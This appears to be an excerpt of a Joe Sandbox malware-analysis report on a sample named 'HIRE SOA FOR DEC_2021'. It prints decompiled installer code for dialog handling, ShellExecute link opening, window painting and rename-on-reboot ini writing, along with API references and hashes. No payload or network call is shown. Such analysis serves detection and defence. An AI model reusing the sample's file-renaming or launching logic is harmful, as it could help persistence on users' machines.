						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x0040396d
0x00403976
0x00403ab7
0x00403abb
0x00403abf
0x00403ac1
0x00403ac6
0x00403ad1
0x00403adc
0x00403ae1
0x00403ae3
0x00403ae5
0x00403ae8
0x00403aed
0x00403afb
0x00403b08
0x00403b0f
0x00403b0f
0x00403b10
0x00403b10
0x00403b15
0x00403b1b
0x00403b22
0x00403b28
0x00403b2a
0x00403b6a
0x00403b6f
0x00403b74
0x00403b74
0x00403b79
0x00403b82
0x00403b84
0x00403b89
0x00403b8f
0x00403b93
0x00403b93
0x00403b98
0x00403b9e
0x00000000
0x00000000
0x00403ba9
0x00403baf
0x00000000
0x00000000
0x00403bb8
0x00403bc0
0x00403bc5
0x00403bc8
0x00403bce
0x00403bd3
0x00403bd6
0x00403bdc
0x00403be1
0x00403be4
0x00403bea
0x00403bf2
0x00403bf8
0x00403bfe
0x00403c02
0x00403c09
0x00403c09
0x00403c09
0x00403c13
0x00403c25
0x00403c31
0x00403c36
0x00403c40
0x00403c46
0x00403c48
0x00403c4d
0x00403c4a
0x00403c4a
0x00403c4a
0x00403c5d
0x00403c75
0x00403c77
0x00403c7d
0x00403c92
0x00403c7f
0x00403c88
0x00403c8a
0x00403c8a
0x00403c98
0x00403ca8
0x00403cb9
0x00403cc0
0x00403cc6
0x00403cca
0x00403ccf
0x00403cd1
0x00000000
0x00403cd7
0x00403cd7
0x00403cd9
0x00000000
0x00000000
0x00403cdf
0x00403ce3
0x00403d08
0x00403d0e
0x00403d14
0x00403d16
0x00000000
0x00000000
0x00403d3c
0x00403d42
0x00403d44
0x00403d49
0x00000000
0x00000000
0x00403d4f
0x00403d52
0x00403d55
0x00403d6c
0x00403d78
0x00403d91
0x00403d97
0x00403d9b
0x00403da0
0x00403da6
0x00000000
0x00000000
0x00403db0
0x00403dbb
0x00000000
0x00403dbb
0x00403ce5
0x00403ceb
0x00000000
0x00000000
0x00403cf1
0x00403cf7
0x00000000
0x00000000
0x00000000
0x00403cfd
0x00403cd1
0x00403dc8
0x00403dd4
0x00403ddb
0x00000000
0x00403b2c
0x00403b2c
0x00403b2f
0x00403b62
0x00403b62
0x00403b64
0x00000000
0x00000000
0x00000000
0x00403b64
0x00403b31
0x00403b35
0x00403b3a
0x00403b3c
0x00000000
0x00000000
0x00403b4c
0x00403b54
0x00000000
0x00403b5a
0x00403988
0x00403988
0x0040398c
0x00403991
0x004039a0
0x004039a0
0x004039a9
0x004039b2
0x004039bd
0x004039bd
0x004039c9
0x004039e5
0x004039e8
0x004039fb
0x00403a01
0x00403aa4
0x00000000
0x00403aad
0x00403a07
0x00403a14
0x00403a16
0x00403a18
0x00403a37
0x00403a37
0x00403a3a
0x00403a3f
0x00403a42
0x00403a52
0x00403a53
0x00403a55
0x00403a8b
0x00403a9e
0x00000000
0x00403a9e
0x00403a57
0x00403a5d
0x00403a76
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00403a7f
0x00403a6b
0x00403a6b
0x00403a6d
0x00403a6d
0x00000000
0x00403a6d
0x00403a60
0x00403a65
0x00000000
0x00403a65
0x00403a44
0x00403a4a
0x00000000
0x00000000
0x00403a4c
0x00000000
0x00403a4c
0x00403a3c
0x00000000
0x00403a3c
0x00403a22
0x00403a29
0x00403a2f
0x00403a31
0x00000000
0x00000000
0x00000000
0x00403a31
0x004039ed
0x00000000
0x004039cb
0x004039d1
0x004039db
0x00403de1
0x00403de7
0x00403df4
0x00403dfa
0x00403dfa
0x00403e04
0x00000000
0x00403e04
0x004039c9

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32 ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

0x00403f8f
0x004040b5
0x00404111
0x00404115
0x004041ec
0x004041ee
0x004041ee
0x004041f4
0x004041f4
0x004041f7
0x00000000
0x004041fe
0x00404123
0x00404125
0x0040412f
0x0040413a
0x0040413d
0x00404140
0x0040414b
0x0040414e
0x00404155
0x00404163
0x0040417b
0x00404183
0x0040418e
0x0040419e
0x004041a0
0x004041a0
0x00404155
0x004041aa
0x00000000
0x004041b5
0x004041b9
0x004041ca
0x004041ca
0x004041d0
0x004041de
0x004041de
0x00000000
0x004041e2
0x004041aa
0x004040c0
0x00000000
0x004040d4
0x004040d4
0x004040da
0x004040da
0x004040e0
0x00000000
0x00000000
0x00404105
0x00404107
0x0040410c
0x00000000
0x0040410c
0x004040c0
0x00403f95
0x00403f98
0x00403f9d
0x00403fae
0x00403fae
0x00403fb5
0x00403fb8
0x00403fba
0x00403fbf
0x00403fc8
0x00403fce
0x00403fda
0x00403fdd
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x0040400a
0x00404011
0x00404024
0x00404027
0x0040403c
0x00404043
0x00404048
0x0040404d
0x0040404d
0x0040405c
0x0040406b
0x0040406d
0x00404083
0x00404092
0x00404094
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
GetSysColor.USER32(?), ref: 0040404D
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32(00000000), ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE

Strings

@.B, xrefs: 00404183
N, xrefs: 00404111
open, xrefs: 00404186

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004057d9
0x004057e0
0x004057e4
0x004057ed
0x004057f1
0x00405930
0x00405930
0x00000000
0x00405930
0x004057f1
0x004057fd
0x00405813
0x0040583b
0x00405846
0x0040584a
0x0040586a
0x00405871
0x0040587b
0x00405888
0x0040588d
0x00405892
0x00405896
0x00000000
0x00000000
0x004058a5
0x004058a7
0x004058b4
0x004058b8
0x00405929
0x0040592a
0x00000000
0x004058d4
0x004058e1
0x00405946
0x0040594d
0x004058f4
0x004058f4
0x004058f6
0x004058ff
0x0040590a
0x0040591c
0x00405923
0x00000000
0x00405923
0x0040594f
0x00405950
0x00405955
0x00405957
0x00405964
0x00405964
0x00405968
0x00000000
0x00000000
0x00000000
0x00000000
0x00405959
0x00405959
0x0040595c
0x0040595f
0x00405960
0x00000000
0x00405959
0x004058ec
0x004058f1
0x00000000
0x004058f1
0x004058b8
0x00405815
0x00405820
0x00405829
0x0040582d
0x00000000
0x00000000
0x0040582d
0x0040593a

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
